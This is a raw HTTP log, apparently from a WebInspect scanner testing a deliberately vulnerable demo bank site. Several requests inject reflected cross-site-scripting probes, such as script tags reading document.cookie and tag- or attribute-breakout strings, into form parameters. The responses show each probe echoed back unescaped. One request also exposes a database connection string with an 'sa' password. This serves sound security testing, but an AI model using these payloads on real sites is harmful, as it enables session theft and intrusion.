<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_vti_txt/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=test@<script>alert(document.cookie)</script>.com&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 397
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = test@<script>alert(document.cookie)</script>.com</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>--><script>alert('XSS')</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=>"><script>alert("XSS")</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /forgot2.asp?msg2=no&msg=</textarea><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1854
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"></textarea><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /banklogin.asp?err=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4966
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>1"style="background:url(javascript:alert('XSS'))" "<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /test/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:33 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=test@<script>alert(document.cookie)</script>.com&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
